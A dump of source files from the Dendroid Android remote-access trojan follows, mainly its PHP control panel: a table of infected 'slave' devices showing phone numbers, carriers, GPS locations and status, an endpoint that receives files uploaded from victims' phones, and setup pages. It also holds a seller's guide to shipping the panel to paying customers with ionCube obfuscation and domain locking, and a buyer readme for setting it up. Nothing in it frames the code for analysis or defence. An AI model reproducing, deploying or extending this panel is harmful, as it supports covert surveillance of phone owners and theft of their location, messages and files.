    73 | 74 | -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/setup/laststep.php: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | 19 | 20 | 21 | Setup: Last Step 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 68 | 69 |
    70 |

    Setup Complete

    71 |

    Thank you for completing first time setup. Everything you just setup can be changed in the Panel Settings.

    Please delete the setup folder before continuing. It is not required, but recommended for security purposes. If you are ready to continue to the Control Panel, click the button below:

    72 |
    73 | 74 | -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/showpictures.php: -------------------------------------------------------------------------------- 1 | Delete All
    '; 9 | foreach($images as $image) { 10 | echo ''; 11 | } 12 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/table.php: -------------------------------------------------------------------------------- 1 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | query($getslaves) as $row) { 96 | $today = time(); 97 | $origdate = strtotime($row['update']); 98 | $secdiff = $today - $origdate; 99 | $mindiff = $secdiff / 60; 100 | 101 | if ($mindiff > $offlineminutes) { 102 | $status = "Offline"; 103 | } else { 104 | $status = "Online"; 105 | } 106 | 107 | $datetime = new DateTime($row['update']); 108 | $timezone = new DateTimeZone($timezonesetting); 109 | $datetime->setTimezone($timezone); 110 | $lastupdatetime = $datetime->format("Y-m-d H:i:s"); 111 | 112 | echo ''; 113 | echo ''; 114 | echo ''; 115 | echo ''; 116 | echo ''; 117 | echo ''; 118 | echo ''; 119 | echo ''; 120 | echo ''; 121 | echo ''; 122 | echo ''; 123 | }?> 124 | 125 |
    #UIDStatusLast UpdatedCell #Cell ProviderLocationDeviceSDKVersionAdd
    ' . $row['id'] . '' . $row['uid'] . '' . $status . '' . $lastupdatetime . '' . $row['phone'] . '' . $row['provider'] . '(' . $row['lati'] . ', ' . $row['longi'] . ')' . $row['device'] . '' . $row['sdk'] . '' . $row['version'] . '
    126 | 127 | -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/upload-pictures.php: -------------------------------------------------------------------------------- 1 | 0) 20 | { 21 | $error = "Return Code: " . $_FILES["file"]["error"]; 22 | } 23 | else 24 | { 25 | $file = "{" . md5(rand(1000, 9999) . time()) . "}" . $_FILES["file"]["name"]; 26 | if(!is_dir("dlfiles/" . $_GET['UID'] . "/")){ mkdir("dlfiles/" . $_GET['UID'] . "/"); } 27 | if(move_uploaded_file($_FILES["file"]["tmp_name"], "dlfiles/" . $_GET['UID'] . "/" . $file)) 28 | { 29 | $error = "File has been uploaded"; 30 | } 31 | } 32 | } 33 | else 34 | { 35 | $error = "Invalid file"; 36 | } 37 | } 38 | else 39 | { 40 | $error = "Invalid password"; 41 | } 42 | } 43 | else 44 | { 45 | $error = "file not set"; 46 | } 47 | } 48 | else 49 | { 50 | $error = "Password or UID not set"; 51 | } 52 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/README - How to ship to customers.txt: -------------------------------------------------------------------------------- 1 | ______ _______ _ ______ _______ _______ _________ ______ 2 | ( __ \ ( ____ \( ( /|( __ \ ( ____ )( ___ )\__ __/( __ \ 3 | | ( \ )| ( \/| \ ( || ( \ )| ( )|| ( ) | ) ( | ( \ ) 4 | | | ) || (__ | \ | || | ) || (____)|| | | | | | | | ) | 5 | | | | || __) | (\ \) || | | || __)| | | | | | | | | | 6 | | | ) || ( | | \ || | ) || (\ ( | | | | | | | | ) | 7 | | (__/ )| (____/\| ) \ || (__/ )| ) \ \__| (___) |___) (___| (__/ ) 8 | (______/ (_______/|/ )_)(______/ |/ \__/(_______)\_______/(______/ 9 | 10 | 11 | This file contains instructions on how to 1. Setup URL locking, 2. ionCube the panel, and 3. Pack it up for delivery. 12 | 13 | Something to consider: 14 | 1. Don't mention reg.php to the customers, the more they know about the URL locking system, the easier it is for them to crack our protection and share the panel freely. 15 | If they don't know what reg.php is, we are probably better off. 16 | 17 | I. URL LOCKING 18 | 1. Open Panel/reg.php in Notepad++ (Recommended) or similar text editing application. 19 | 2. Change "www.pizzachip.com" and "pizzachip.com" on line 1 to the domain the customer has specified. 20 | 2-1. For example: $allowedDomains = array("www.androidcapture.com", "androidcapture.com"); 21 | 3. Save reg.php 22 | 23 | II. ionCube 24 | 1. Visit http://ioncube.com 25 | 2. Login to your ionCube account. 26 | 3. Click "Encode" or visit https://www.ioncube.com/main.php?c=encode 27 | 4. ZIP the files inside of the Panel folder. 28 | 5. "Choose File" on ionCube.com and select the ZIP. 29 | 6. Make sure only "Allow short open tags ()" is checked. 30 | 7. Set "Encoder Selection" to "8.0" 31 | 8. Set "Source Language" to "PHP 5.3" 32 | 9. Click "Upload" 33 | 10. When the "Download" button appears, click it. 34 | 35 | III. Final Packing 36 | 1. Create a "Dendroid" folder, and create a folder inside of that folder named "HTTP Panel" 37 | 1. Extract the ZIP file you downloaded in Section II, Step 10 to the "HTTP Panel" folder. 38 | 2. Ensure there is a "dlfiles" folder, along with "assets" and "setup" 39 | 2-1. If there is no "dlfiles" folder, create one. 40 | 3. Copy the "README" and "SQL" files from the "Other Files" folder you have into the "Dendroid" folder. 41 | 4. Ensure your finished folder structure for the clients looks like this: 42 | 43 | "Dendroid" => 44 | "README.txt" 45 | "SQL.sql" 46 | "HTTP Panel" => 47 | "assets" 48 | "setup" => 49 | "createconfig.php" 50 | "index.php" 51 | "laststep.php" 52 | "step1.php" 53 | "dlfiles" 54 | "addcommand.php" 55 | "applysettings.php" 56 | "blockbot.php" 57 | "clearawaiting.php" 58 | "clearmessages.php" 59 | "control.php" 60 | "deletebot.php" 61 | "deletefile.php" 62 | "deletepics.php" 63 | "filetable.php" 64 | "functions.php" 65 | "get-functions.php" 66 | "get.php" 67 | "getimages.php" 68 | "getmessages.php" 69 | "getawaitingcommands.php" 70 | "index.php" 71 | "login.php" 72 | "logout.php" 73 | "message.php" 74 | "new-upload.php" 75 | "reg.php" 76 | "settings.php" 77 | "showpictures.php" 78 | "table.php" 79 | "upload-pictures.php" 80 | 81 | 5. ZIP the "Dendroid" folder. 82 | 6. Send to client. -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/._Dendroid Panel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/._Dendroid Panel -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/._.DS_Store: -------------------------------------------------------------------------------- 1 | Mac OS X  2Fx ATTRxx -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/._Other Files: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/._Other Files -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/._Panel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/._Panel -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/._README - How to ship to customers.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/._README - How to ship to customers.txt -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Other Files/._README.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Other Files/._README.txt -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Other Files/._SQL.sql: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Other Files/._SQL.sql -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._addcommand.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._addcommand.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._applysettings.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._applysettings.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._assets: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._assets -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._blockbot.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._blockbot.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._clearawaiting.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._clearawaiting.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._clearmessages.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._clearmessages.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._control.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._control.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._deletebot.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._deletebot.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._deletefile.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._deletefile.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._deletepics.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._deletepics.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._dlfiles: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._dlfiles -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._filetable.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._filetable.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._functions.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._functions.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._get-functions.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._get-functions.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._get.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._get.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._getimages.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._getimages.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._getmessages.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._getmessages.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._getwaitingcommands.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._getwaitingcommands.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._index.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._index.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._login.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._logout.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._logout.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._message.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._message.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._new-upload.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._new-upload.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._reg.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._reg.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._settings.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._settings.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._setup: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._setup -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._showpictures.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._showpictures.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._table.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._table.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._upload-pictures.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/._upload-pictures.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._css -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._fonts: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._fonts -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._img: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._img -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._js -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._bootstrap-glyphicons.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._bootstrap-glyphicons.css -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._bootstrap.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._bootstrap.css -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._bootstrap.min.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._bootstrap.min.css -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._image-picker.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._image-picker.css -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.eot -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.otf -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.svg -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.ttf -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.woff -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._banner.png -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._bannerrot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._bannerrot.png -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._bg_off.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._bg_off.jpg -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._bg_on.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._bg_on.jpg -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._login_bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._login_bg.png -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._logo.png -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._bootstrap.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._bootstrap.js -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._bootstrap.min.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._bootstrap.min.js -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._date.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._date.js -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._image-picker.min.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._image-picker.min.js -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._jquery.tablesorter.min.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._jquery.tablesorter.min.js -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._jquery.tablesorter.widgets.min.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._jquery.tablesorter.widgets.min.js -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._createconfig.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._createconfig.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._index.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._index.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._laststep.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._laststep.php -------------------------------------------------------------------------------- /master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._step1.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._step1.php -------------------------------------------------------------------------------- /master/readme.md: -------------------------------------------------------------------------------- 1 | Thank You For Purchasing The Dendroid Source! 2 | 3 | Requirements: 4 | Web server with PHP and MySql 5 | phpmyadmin (Easy DB setup) 6 | OpenJDK JRE x64 7 | Java JDK (If on x64 Windows you need to set the environment variable JAVA_HOME C:\Program Files\Java\JDK*** 8 | 9 | Web Panel Setup: 10 | Extract Dendroid Panel 11 | Move all files to your web server or httdocs if following setup video 12 | Set correct permissions (Linux) 13 | Change URL to your web server in reg.php 14 | 15 | Change URL to your web server in Following Files, E.G http://127.0.0.1/: 16 | applysettings.php 17 | blockbot.php 18 | clearawaiting.php (Also add